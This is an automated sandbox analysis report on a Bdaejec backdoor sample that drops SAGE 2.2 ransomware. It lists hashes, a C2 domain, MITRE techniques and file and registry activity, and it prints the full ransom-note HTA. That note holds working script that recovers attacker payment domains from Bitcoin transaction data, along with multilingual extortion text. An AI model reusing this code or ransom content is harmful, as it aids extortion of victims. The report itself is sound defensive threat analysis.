bdaejec | a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f

Analysis

max time kernel
143s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18-11-2024 21:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe
Size

355KB
MD5

d80e625211db0a05bb8346f1fc2551f9
SHA1

2eab153918e144c22eb00d2f47e8757f21b39211
SHA256

a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f
SHA512

69261b12ffa2568f20752dab17cc48fe97598f4f640eba4d0dd54b0ab44ff6be529a97eadc1ef23d8758fd70d53c54fa9a764b9f4de86465e4004dffafd461cd
SSDEEP

6144:JnYGYzfdtj1alRL2ERw4UAJrx2A41E7vc7YI6Na2UX:JnYGYj/j428rx2ApvcUPbU

Score

10^/10

bdaejec aspackv2 backdoor discovery ransomware

Malware Config

Extracted

Family

bdaejec

ddos.dnsnb8.net

Extracted

Path

C:\Users\Admin\Documents\!HELP_SOS.hta

Ransom Note

<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Decryption Instructions</title> <HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 12pt; line-height: 16pt; } body, h1 { margin: 0; padding: 0; } h1 { color: #555; text-align: center; padding-bottom: 1.5em; line-height: 1.2; } h2 { color: #555; text-align: center; line-height: 1.2; } ol li { padding-bottom: 13pt; } .container { background-color: #EEE; border: 2pt solid #C7C7C7; margin: 3%; min-width: 600px; padding: 5% 10%; color: #444; } .filecontainer{ padding: 5% 10%; display: none; } .header { border-bottom: 2pt solid #c7c7c7; padding-bottom: 5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .key{ background-color: #A1D490; border: 1px solid #506A48; display: block; text-align: center; margin: 0.5em 0; padding: 1em 1.5em; word-wrap: break-word; } .keys{ margin: 3em 0; } .filename{ border: 3px solid #AAA; display: block; text-align: center; margin: 0.5em 0em; padding: 1em 1.5em; background-color: #DCC; } .us{ text-decoration: strong; color: #333; } .info{ background-color: #E4E4E4; padding: 0.5em 3em; margin: 1em 0; } .text{ text-align: justify; } #file{ background-color: #FCC; } .lsb{ display: none; margin: 3%; text-align: center; } .ls{ border: 1px solid #888; border-radius: 3px; padding: 0 0.5em; margin: 0.2em 0.1em; line-height: 2em; display: inline-block; } .ls:hover{ background-color: #D0D0D0; } .l{ display:none; } .lu{ display:none; } </style> <script language="vbscript"> Function GetCmd GetCmd = App.commandLine End Function </script> <script language="javascript"> function openlink(url){ new ActiveXObject("WScript.Shell").Run(url); return false; } function aIndexOf(arr, v){ for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i; return -1; } function tweakClass(cl, f){ var els; if(document.getElementByClassName != null){ els = document.getElementsByClassName(cl); } else{ els = []; var tmp = document.getElementsByTagName('*'); for (var i = 0; i < tmp.length; i++){ var c = tmp[i].className; if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]); } } for(var i = 0; i < els.length; i++) f(els[i]); } function show(el){ el.style.display = 'block'; } function hide(el){ el.style.display = 'none'; } var langs = ["en","de","it","fr","es","no","pt","nl","kr","ms","zh","tr","vi","hi","jv","fa","ar"]; function setLang(lang){ if(aIndexOf(langs, lang) == -1) lang = langs[0]; for(var i = 0; i < langs.length; i++){ var clang = langs[i]; tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; }); tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; }); } } function newXHR() { if (window.XMLHttpRequest) return new window.XMLHttpRequest; try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } function getPage(url, cb) { try{ var xhr = newXHR(); if(!xhr) return cb('no xhr'); xhr.onreadystatechange = function() { if(xhr.readyState != 4) return; if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status) cb(null, xhr.responseText); }; xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" : "&") + "_=" + new Date().getTime(), true); xhr.send(); } catch(e){ cb(e); } } function decodeTxString(hex){ var m = '0123456789abcdef'; var s = ''; var c = 0xAA; hex = hex.toLowerCase(); for(var i = 0; i < hex.length; i+=2){ var a = m.indexOf(hex.charAt(i)); var b = m.indexOf(hex.charAt(i+1)); if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b; s+= String.fromCharCode(c = (c ^ ((a << 4) | b))); } return s; } var OR = 'OP_RE'+'TURN '; var sources = [ {bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.vouts; for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10)); return null; } }, {bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.outputs; for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10)); return null; } }, {bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all', ptxs: function(json){ var res = []; for(var i = 0; i < json.length; i++) res.push(json[i][1]); return res; }, ptx: function(json){ var os = json.output; for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10)); return null; } }, {bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', txp:'txs/', adp:'addrs/', ptxs: function(json){ var res = []; var m = {}; for(var i = 0; i < json.txrefs.length; i++){ var tx = json.txrefs[i].tx_hash; if(m[tx]) continue; m[tx] = 1; res.push(tx); } return res; }, ptx: function(json){ var os = json.outputs; for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex); return null; } } ]; function eachUntil(a,f,c){ var i = 0; var n = function(){ if(i >= a.length) return c('f'); f(a[i++], function(err, res){ if(err == null) return c(null, res); n(); }); }; n(); } function getJson(url, cb){ getPage(url, function(err, res){ if(err != null) return cb(err); var json; try{ if(window.JSON && window.JSON.parse){ json = window.JSON.parse(res); } else{ json = eval('('+res+')'); } } catch(e){ cb(e); } cb(null, json); }); } function getDomains(ad, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp; url+= s.adp+ad; if(s.adpb) url+= s.adpb; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptxs(json)); } catch(e){ cb(e); } }); }, function(err, txs){ if(err != null) return cb(err); if(txs.length == 0) return cb('f'); eachUntil(txs, function(tx, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp+s.txp+tx; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptx(json)); } catch(e){ cb(e); } }); }, function(err, res){ if(err != null) return cb(err); if(res == null) return cb('f'); cb(null, res.split(':')); }); }, cb); }); } function updateLinks(){ tweakClass('lu', hide); tweakClass('lu-updating', show); getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){ tweakClass('lu', hide); if(err != null){ tweakClass('lu-error', show); return; } tweakClass('lu-done', show); var html = ''; for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://7gie6ffnkrjykggd.'+ds[i]+'/login/AZzvr7TVpJKtfhem9gNoPBHevFZrvEQEVgB1o_Y3aa-nFJ9wAwE6rzTA" onclick="javascript:return openlink(this.href)">http://7gie6ffnkrjykggd.'+ds[i]+'/</a></div>'; tweakClass('links', function(el){ el.innerHTML = html; }); }); return false; } function onPageLoaded(){ try{ tweakClass('lsb', show); }catch(e){} try{ tweakClass('lu-orig', show); }catch(e){} try{ setLang('en'); }catch(e){} try{ var args = GetCmd().match(/"[^"]+"|[^ ]+/g); if(args.length > 1){ var file = args[args.length-1]; if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2); document.getElementById('filename').innerHTML = file; show(document.getElementById('file')); document.title = 'File is encrypted'; } }catch(e){} } </script> </head> <body onload='javascript:onPageLoaded()'> <div class='lsb'> <span class='ls ls-en' onclick="javascript:return setLang('en')">English</span> <span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span> <span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span> <span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span> <span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span> <span class='ls ls-no' onclick="javascript:return setLang('no')">Norsk</span> <span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span> <span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span> <br/><span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span> <span class='ls ls-ms' onclick="javascript:return setLang('ms')">Bahasa Melayu</span> <span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span> <span class='ls ls-tr' onclick="javascript:return setLang('tr')">Türkçe</span> <span class='ls ls-vi' onclick="javascript:return setLang('vi')">Tiếng Việt</span> <span class='ls ls-hi' onclick="javascript:return setLang('hi')">हिन्दी</span> <span class='ls ls-jv' onclick="javascript:return setLang('jv')">Basa Jawa</span> <span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span> <span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span> </div> <div id='file' class='container filecontainer'> <div class='filename'> <div style='float:left; padding:18px 0'><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADEAAABACAYAAACz4p94AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAARCQAAEQkAGJrNK4AAAAB3RJTUUH4QEcFBoaYAOrHQAABThJREFUaN7tmlloXGUUx3/3ziRtTa2xcZ1gtaJFDFjtwSqllaKiiEilKOKDNS2UivXF+qD0QRBRUMQXN/TBBcFifahYFC0urfpghSMqaDSkdQMvojZpIk2zTMaHe776MZ17M6u9ozkwzAwz3/ed/9m+s9yABkhEUFX/+43ATcBy4FxgMdABTAB/Aj8CXwO7VfVdb10AlPy9aqGgTuYDVS3Z56XA48AtdWz1OrBdVQ82AiaoVfJATlWLIrIAeAbYWKciS975LwJ3q+pEJQ03DYRJKVDVGRFZCew0kylnqFaaAULgB+B2Vd1fru3ZKFcDAFS1JCLXA7uBMxs1S29t0fzn5kKhMBBF0WAURYgIURQ1DsIAhKaBVcAbwKk0l0JgGlgIrCkUChpF0U/VAgmrOCBvPrAEeBY4jdZQ3jRyDvCEiJxl2ne+mLowTQs5VZ0yJ95mobMaRx0A3gMGgSPAycCFwHXARQlrfKFeDjwMbG7IsT0zKorIauBtYFGFvxY9s3wZ2Kaqwyn7dgNPpkQ1t9/PwGZV3TNbxErThAOwCOhPADBtexwGNqrqrrR4bxFnBNgkIm8CrwFdCX66BNgA7KlLE2aDeVWdFpHlwPsVfMEBGAXuUtUd1YRGH6CIrLdAESZoYxC4Q1U/r8exQwMQAFdb+CuP7U6LO6oF4MK0d+47ZlpJfJ0HXFsm3OpB2HsPsCZBUtgF9VSZo85KFq7zqnrUTOq3ChYyA3QCq7x1NYFwZnYKsKJCFOqwz59YJKo5VTAmAQ4CuxKiHUCviCyryZzMhIqeOnsSDh8B9qnqTJqU0kKyAT8MfJwiyB5gWa0+ETjGgPOBeQkSGgG+rPdmM99wfjUEHEoA0Q0srRmEaSRv+VFHAogx84lGyO01ChxI+E8XcHq9aUdnhahU8uL471bszJoWVEFHbL8kHhfXCyIE5qesGXX+UW9F5mli0jSbRPMaAdGZ8vtUtSG1ykg1mXIRdzaaxVYjSU7kPmFKaAsq5DW+dBY2WAyV89GV8ntXran4tGfzW4B7K0grAI5WMIF6zAjgD2ATsDXhrPFaGwGZJhE59jrOPMraMIuBK4EzTFqlE8x7YNr6TFUP+dkwQCAiobuhRWQt8DTQl2FlfAtsVdW9DoyviUeA7U1owbSSfL4eU9UHjlVRInI/8FDGATizcvytLhQKQRRFewMRuQJ4y+y/Xcg13IaA/tBCWxftRe5+uwC4NQTWzpabZFgbAFeF1qzKtSEIp40+l+QFtC91hvwHaA7E/xlEKesgZrz6u19VA/eytH64FUGkmSCKtt8XwKWq+opL0GxE8AKwknh6mkkQ03bXRMTT0F9d7m/pfdGy5SHgPtclyRoIZyLfAR95APC6If4A5sOsgfB7UQe88jbJoceI+6+ZdeyOKrWWzxqIwJN+H/F8rlJDzR8XrMiyT1wM3OnX7V797oBeQzxYbF6lJCLTTcpi3fhrBNiiqjsrNCBuIx5Ozs+qT+SJW5vdxHPoS3yHlrjH8nyzAbTCsZ1ZjfPPoMa/DMdpAc0lgHMg2gREqcxPSrSoHdoqx+4Ceu3Sc4x3c/wkNpMgclZT9AIPisjZFl57gUeZZeKThcuuvDhyAppsFfOt9gl/385/w7FLtDmFwF9ebdxO5IQ/HBIPLabaGMT+kLitP9GGAELi4ecHIfAqyc9VZJWc+SvwUi6KorFCofANsA44qQ0AuEfrfgHuUdWB0IqWT4Ebml3At4hywPfAelXd5y47sIfY7XbdQNytuwxYkCHmR4GvgOfcM4fGL38Dzdjo/H/3PFAAAAAASUVORK5CYII=" style='padding:0 7.5px'/></div> <div> <h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2><h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2><h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2><h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2><h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2><h2 class='l l-no' >Filen er kryptert men kan bli gjenopprettet</h2><h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2><h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2><h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2><h2 class='l l-ms' >Fail ini dienkripsikan tetapi boleh dipulih semula.</h2><h2 class='l l-zh' >文件已被加密，但是可以解密</h2><h2 class='l l-tr' >Dosya şifrelenmiş ancak geri yüklenebilir.</h2><h2 class='l l-vi' >Tập tin bị mã hóa nhưng có thể được khôi phục</h2><h2 class='l l-hi' >फाइल एनक्रिप्‍टड हैं लेकिन रिस्‍टोर की जा सकती हैं</h2><h2 class='l l-jv' >File ini dienkripsi tetapi dapat dikembalikan</h2><h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2><h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2> <p><span id='filename'></span></p> </div> </div> <h2 class='l l-en' style='display:block'>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2><h2 class='l l-de' >Die Datei, die Sie öffnen wollten, und andere wichtige Dateien auf ihrem Computer wurden von "SAGE 2.2 Ransomware" verschlüsselt.</h2><h2 class='l l-it' >Il file che hai tentato di aprire e altri file importanti del tuo computer sono stati crittografati da "SAGE 2.2 Ransomware".</h2><h2 class='l l-fr' > Le fichier que vous essayez d’ouvrir et d’autres fichiers importants sur votre ordinateur ont été cryptés par "SAGE 2.2 Ransomware".</h2><h2 class='l l-es' >El archivo que intentó abrir y otros importantes archivos en su computadora fueron encriptados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-no' >Filen du prøvde åpne og andre viktige filer på datamaskinen din ble kryptert av "SAGE 2.2 Ransomware".</h2><h2 class='l l-pt' >O arquivo que você está tentando acessar está criptografado, outros arquivos importantes em seu computador também foram criptografados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-nl' >Het bestand dat je probeert te openen en andere belangrijke bestanden op je computer zijn beveiliged door "SAGE 2.2 Ransomware".</h2><h2 class='l l-kr' >컴퓨터에서 여는 파일 및 기타 중요한 파일은 "SAGE 2.2 Ransomware"에 의해 암호화되었습니다.</h2><h2 class='l l-ms' >Fail yang anda cuba buka dan fail penting yang lain di komputer anda telah dienkripskan oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-zh' >您试图打开的文件以及您计算机上的其它文件已经用"SAGE 2.2 Ransomware"进行了加密。</h2><h2 class='l l-tr' >Açmaya çalıştığınız dosya ve diğer önemli dosyalarınızı bilgisayarınızda "SAGE 2.2 Ransomware" tarafından şifrelenmiş.</h2><h2 class='l l-vi' >Tập tin mà bạn cố mở và những tập tin quan trọng khác trên máy tính của bạn bị mã hóa bởi "SAGE 2.2 Ransomware".</h2><h2 class='l l-hi' >वो फाइल जिसे आपने खोलने की कोशिश की और आपके कंप्‍यूटर पर बाकी महत्‍वपूर्ण फाइले हमारी ओर से इंक्रिप्टिड की गई हैं "SAGE 2.2 Ransomware"।</h2><h2 class='l l-jv' >File yang Anda coba untuk buka dan file penting lain di komputer Anda yang dienkripsi oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-fa' >فایلی که ش�

URLs

http://'+s.bp

http://'+s.bp+s.txp+tx

Signatures

Bdaejec
Bdaejec is a backdoor written in C++.
backdoor bdaejec
Bdaejec family
bdaejec

Detects Bdaejec Backdoor. 1 IoCs

Bdaejec is backdoor written in C++.

resource	yara_rule
behavioral2/memory/3244-46-0x0000000000CA0000-0x0000000000CA9000-memory.dmp	family_bdaejec_backdoor

Contacts a large (7711) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x0008000000023c8f-3.dat	aspack_v212_v242

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	zvweqmo.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	Rj3fNWF3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	zvweqmo.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	a05806f9060f1f2de61cec62599ef7558dc0b8e4b0a62cc71a1d8e762d91ee1f.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	zvweqmo.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	zvweqmo.exe

Deletes itself 1 IoCs

pid	Process
4848	WScript.exe

Executes dropped EXE 6 IoCs

pid	Process
3244	zvweqmo.exe
708	zvweqmo.exe
3916	Rj3fNWF3.exe
2380	zvweqmo.exe
1480	Rj3fNWF3.exe
3884	zvweqmo.exe

Enumerates connected drives 3 TTPs 21 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\H:	Rj3fNWF3.exe
File opened (read-only)	\??\J:	Rj3fNWF3.exe
File opened (read-only)	\??\M:	Rj3fNWF3.exe
File opened (read-only)	\??\P:	Rj3fNWF3.exe
File opened (read-only)	\??\Q:	Rj3fNWF3.exe
File opened (read-only)	\??\U:	Rj3fNWF3.exe
File opened (read-only)	\??\L:	Rj3fNWF3.exe
File opened (read-only)	\??\S:	Rj3fNWF3.exe
File opened (read-only)	\??\T:	Rj3fNWF3.exe
File opened (read-only)	\??\V:	Rj3fNWF3.exe
File opened (read-only)	\??\X:	Rj3fNWF3.exe
File opened (read-only)	\??\Z:	Rj3fNWF3.exe
File opened (read-only)	\??\I:	Rj3fNWF3.exe
File opened (read-only)	\??\K:	Rj3fNWF3.exe
File opened (read-only)	\??\O:	Rj3fNWF3.exe
File opened (read-only)	\??\R:	Rj3fNWF3.exe
File opened (read-only)	\??\Y:	Rj3fNWF3.exe
File opened (read-only)	\??\E:	Rj3fNWF3.exe
File opened (read-only)	\??\G:	Rj3fNWF3.exe
File opened (read-only)	\??\N:	Rj3fNWF3.exe
File opened (read-only)	\??\W:	Rj3fNWF3.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\Wallpaper	Rj3fNWF3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\DDx.bmp"	Rj3fNWF3.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jcmd.exe	zvweqmo.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Cortana.exe	zvweqmo.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Win32Bridge.Server.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe	zvweqmo.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\YourPhone.exe	zvweqmo.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javaw.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\policytool.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\msotd.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\msoadfsb.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\SDXHelperBgt.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jabswitch.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\javacpl.exe	zvweqmo.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe	zvweqmo.exe
File opened for modification	C:\Program Files\7-Zip\7zG.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE	zvweqmo.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AppSharingHookController.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jjs.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\orbd.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ORGCHART.EXE	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PPTICO.EXE	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MSOHTMED.EXE	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\klist.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSOSREC.EXE	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jinfo.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\msoia.exe	zvweqmo.exe
File opened for modification	C:\Program Files (x86)\Windows Mail\wabmig.exe	zvweqmo.exe
File opened for modification	C:\Program Files\7-Zip\Uninstall.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE	zvweqmo.exe
File opened for modification	C:\Program Files\dotnet\dotnet.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javadoc.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\unpack200.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\idlj.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javap.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\officeappguardwin32.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\keytool.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\eqnedt32.exe	zvweqmo.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\onenoteshare.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PerfBoost.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Wordconv.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\orbd.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\ktab.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\CLVIEW.EXE	zvweqmo.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate32.exe	zvweqmo.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\ssvagent.exe	zvweqmo.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\orbd.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\javaw.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\kinit.exe	zvweqmo.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Install\{86586A1C-7EEC-4BB2-AD86-7C1FB3D0D811}\chrome_installer.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jdeps.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\schemagen.exe	zvweqmo.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\unpack200.exe	zvweqmo.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rj3fNWF3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rj3fNWF3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zvweqmo.exe
